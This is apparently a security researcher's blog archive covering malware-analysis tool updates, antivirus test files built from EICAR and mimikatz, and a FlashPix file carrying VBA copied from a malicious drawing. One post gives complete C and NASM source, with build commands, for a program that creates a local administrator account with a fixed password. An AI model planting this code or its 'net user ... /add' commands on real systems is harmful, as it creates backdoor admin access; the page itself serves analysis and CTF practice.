In this video, I use GNU Radio Companion (without SDR) to illustrate the acoustic beat phenomenon.
I mention a 400Hz dial tone in this video, but this will vary by country.
Saturday 4 April 2020
Friday 3 April 2020
Overview of Content Published in March
Here is an overview of content I published in March:
Blog posts:
- Contextual Grepping: Proxmark3 Key Scan Example
- Update: oledump.py Version 0.0.47
- Update: oledump.py Version 0.0.48
- CLSIDs in OLE Files
- Update: cmd.dll Version 0.0.5
- pecheck.py Version 0.7.10
- Windows Assembly Program To Create New User
- Quickpost: User-Agent: Microsoft Office Excel 2014
- Carving PE Files With pecheck.py
- Quickpost: Windows Domain Controllers Have No Local Accounts
- Update: oledump.py Version 0.0.49
- mimikatz Is My New EICAR
- Update: msoffcrypto-crack.py Version 0.0.5
YouTube videos:
Videoblog posts:
SANS ISC Diary entries:
- Wireshark 3.2.2 Released: Windows’ Users Pay Attention Please
- Excel Maldocs: Hidden Sheets
- Malicious Spreadsheet With Data Connection and Excel 4 Macros
- Phishing PDF With Incremental Updates.
- More COVID-19 Themed Malware
- KPOT Deployed via AutoIt Script
- Windows Zeroday Actively Exploited: Type 1 Font Parsing Remote Code Execution Vulnerability
- Covid19 Domain Classifier
- Obfuscated Excel 4 Macros
Wednesday 1 April 2020
April 1st 2020: FlashPix File With VBA Code
Last year, there was some misunderstanding regarding Office Documents with VBA code mistakenly identified as FlashPix picture files.
The FlashPix picture format is an old format, based on the Compound File Binary Format (what I like to call OLE files). It has no support for VBA code at all (it doesn’t support any embedded scripting).
However, since it is an ole file, it’s technically possible to add storages and streams containing VBA code. This code can never execute, because the FlashPix specifications does not support it, and hence there are no image viewers that would recognize and execute this code.
So I took a FlashPix image (3d996a887c4a1b5b5ce70528f6bb4508). Here you can see the streams it contains:
And then I took a malicious AutoCAD drawing, and copied the VBA streams and storages into the FlashPix file:
Giving me this file 5040ef90824371a0bd0acaa36263553b.When I submitted this file to VirusTotal a couple of months ago, the AV detection ratio was 29/59. Which is far better than the other “AV-alert pictures” that I created.
If you are in need of a benign file that will trigger anti-virus, I shared this FlashPix PoC on the new malware sharing service Malware Bazaar.
Tuesday 31 March 2020
Update: msoffcrypto-crack.py Version 0.0.5
This new version of msoffcrypto-crack.py, a tool to crack encrypted MS Office documents, comes with a new option to generated a password dictionary based on the filename of the document.
Option -p allows the user to provide a dictionary file. Use value #f to generate a dictionary based on the filename: This will generate a dictionary of all possible substrings of the filename.
I had to analyze an encrypted spreadsheet yesterday, and the password was in the name, like this:
msoffcrypto-crack_V0_0_5.zip (https)
MD5: 1514DA367DCFF7051AB117266CE65BD3
SHA256: FEEFDD89134083EA19936494C8FCBD05804B3B9C0D4C5FBAFE06578D466B50AE
Monday 30 March 2020
mimikatz Is My New EICAR
I helped a friend creating picture files to be detected by anti-virus. They are not malicious: they don’t execute code neither trigger a vulnerability.
The EICAR test file is detected by many anti-virus programs, except when it is appended to arbitrary files (this is according to specs).
Starting with a one-pixel JPEG and PNG file, I append the EICAR test file. And with a JPEG file, I can also insert the EICAR file as a comment:
The detection scores on VirusTotal show that these files are not detected by many anti-virus programs:
That wasn’t good enough for my friend, she needed something with a higher detection score.
Since several years now, there is a Windows program that triggers many anti-virus programs: mimikatz.
When I try mimikatz with picture files, I get better detection scores than for the EICAR test file (as I expected):
And I have a picture file with even higher detection scores, but you’ll have to wait until April Fools day for the details 😉 .
Sunday 29 March 2020
Update: oledump.py Version 0.0.49
This new version of oledump comes with an update to plugin_biff by @JohnLaTwC to improve formula parsing.
oledump_V0_0_49.zip (https)
MD5: 1EF0B466A80C034F10770F8A235EBE7B
SHA256: BD8CAD9EDB99B6063A9A36B8B83EB3416484CEC244A01CA2F08BB032402FF147
Saturday 28 March 2020
Quickpost: Windows Domain Controllers Have No Local Accounts
Windows domain controllers have no local accounts. I think I learned this back when I made my “Practice ntds.dit File Overview” series of blog posts.
Today I had to search for a Microsoft document covering this: Built-in and Account Domains.
Friday 27 March 2020
Carving PE Files With pecheck.py
I added a feature to my tool pecheck.py to help extract embedded PE files from any host file: -l –locate.
pecheck.py expects a PE file as input, but if you use option -l P, it will read any file an look for embedded PE files by searching for a DOS header (MZ) followed by a PE header, that can then be parsed by pefile without errors.
Like in this example, where I created a PNG file with a 32-bit and a 64-bit DLL appended:
One PE file can then be selected for further analysis:
Or for extraction:
Here is a video with more details:
Monday 23 March 2020
Quickpost: User-Agent: Microsoft Office Excel 2014
To start: there is no version 2014 of Microsoft Office.
That’s why I was intrigued when I saw User Agent String “Microsoft Office Excel 2014” appearing in Wireshark when I did some tests with Excel’s data importing features.
With Excel 2019, when I get data from a CSV file and provide an URL (in stead of a local filename) like this:
Excel will issue several OPTIONS and HEAD requests, with different User Agent Strings:
And finally, a GET request to download the file:
Xavier Mertens has mentioned User Agent String “Microsoft Office Excel 2014” in another context: “Microsoft Apps Diverted from Their Main Use“.
- Microsoft Office Excel 2014
- Microsoft Office Excel
- Microsoft Office Protocol Discovery
- Microsoft.Data.Mashup (https://go.microsoft.com/fwlink/?LinkID=304225)
Monday 16 March 2020
Windows Assembly Program To Create New User
A friend asked me for a small program to add a new local user to a Windows system and make that user member of the Administrators group (CTF anyone? 😉 ).
I could find a program in my repository, but it was a very old program using system commands.
#include <stdio.h>
#include <windows.h>
int main(int argc, char* argv[])
{
system("net user hack knock /add");
system("net localgroup administrators hack /add");
return 0;
}
The program worked as expected, however, this inspired me to make a very small program that would do this via the Windows API. Thus I developed the following 32-bit assembler program:
; Assembly code to add a new local user and make it member of Administrators group ; Written for NASM assembler (http://www.nasm.us) by Didier Stevens ; https://DidierStevens.com ; Use at your own risk ; ; Build: ; nasm -f win32 add-admin.asm ; Microsoft linker: ; link /fixed /debug:none /EMITPOGOPHASEINFO /entry:main add-admin.obj kernel32.lib netapi32.lib ; https://blog.didierstevens.com/2018/11/26/quickpost-compiling-with-build-tools-for-visual-studio-2017/ ; /fixed -> no relocation section ; /debug:none /EMITPOGOPHASEINFO -> https://stackoverflow.com/questions/45538668/remove-image-debug-directory-from-rdata-section ; /filealign:256 -> smaller, but no valid exe ; MinGW linker: ; ld -L /c/msys64/mingw32/i686-w64-mingw32/lib --strip-all add-admin.obj -l netapi32 -l kernel32 ; ; History: ; 2020/03/13 ; 2020/03/14 refactor ; 2020/03/15 refactor BITS 32 %define USERNAME 'hacker' %define PASSWORD 'P@ssw0rd' %define ADMINISTRATORS 'administrators' global _main extern _NetUserAdd@16 extern _NetLocalGroupAddMembers@20 extern _ExitProcess@4 struc USER_INFO_1 .uName RESD 1 .Password RESD 1 .PasswordAge RESD 1 .Privilege RESD 1 .HomeDir RESD 1 .Comment RESD 1 .Flags RESD 1 .ScriptPath RESD 1 endstruc struc LOCALGROUP_MEMBERS_INFO_3 .lgrmi3_domainandname RESD 1 endstruc USER_PRIV_USER EQU 1 UF_SCRIPT EQU 1 section .text _main: mov ebp, esp sub esp, 4 ; NetUserAdd(NULL, level=1, buffer, NULL) lea eax, [ebp-4] push eax push UI1 push 1 push 0 call _NetUserAdd@16 ; NetLocalGroupAddMembers(NULL, administrators, level=3, buffer, 1) push 1 push LMI3 push 3 push ADMINISTRATORS_UNICODE push 0 call _NetLocalGroupAddMembers@20 ; ExitProcess(0) push 0 call _ExitProcess@4 ; uncomment next line to put data structure in .data section (increases size PE file because of extra .data section) ; section .data UI1: istruc USER_INFO_1 at USER_INFO_1.uName, dd USERNAME_UNICODE at USER_INFO_1.Password, dd PASSWORD_UNICODE at USER_INFO_1.PasswordAge, dd 0 at USER_INFO_1.Privilege, dd USER_PRIV_USER at USER_INFO_1.HomeDir, dd 0 at USER_INFO_1.Comment, dd 0 at USER_INFO_1.Flags, dd UF_SCRIPT at USER_INFO_1.ScriptPath, dd 0 iend USERNAME_UNICODE: db __utf16le__(USERNAME), 0, 0 PASSWORD_UNICODE: db __utf16le__(PASSWORD), 0, 0 ADMINISTRATORS_UNICODE: db __utf16le__(ADMINISTRATORS), 0, 0 LMI3: istruc LOCALGROUP_MEMBERS_INFO_3 at LOCALGROUP_MEMBERS_INFO_3.lgrmi3_domainandname, dd USERNAME_UNICODE iend
To create the executable, you need to assemble and link this assembly code (this is not shellcode, just assembling is not enough).
Assembling is done with nasm (-f win32 to create a 32-bit object file):
nasm -f win32 add-admin.asm
Linking can be done with Microsoft’s linker (see Quickpost: Compiling with Build Tools for Visual Studio 2017) or MinGW‘s linker.
MS:
link /fixed /debug:none /EMITPOGOPHASEINFO /entry:main add-admin.obj kernel32.lib netapi32.lib
I use /fixed so prevent the creation of a relocation section, which would make the EXE larger.
MinGW:
ld -L /c/msys64/mingw32/i686-w64-mingw32/lib –strip-all add-admin.obj -l netapi32 -l kernel32
In both cases, the EXE is 1536 bytes long.
Didier Stevens 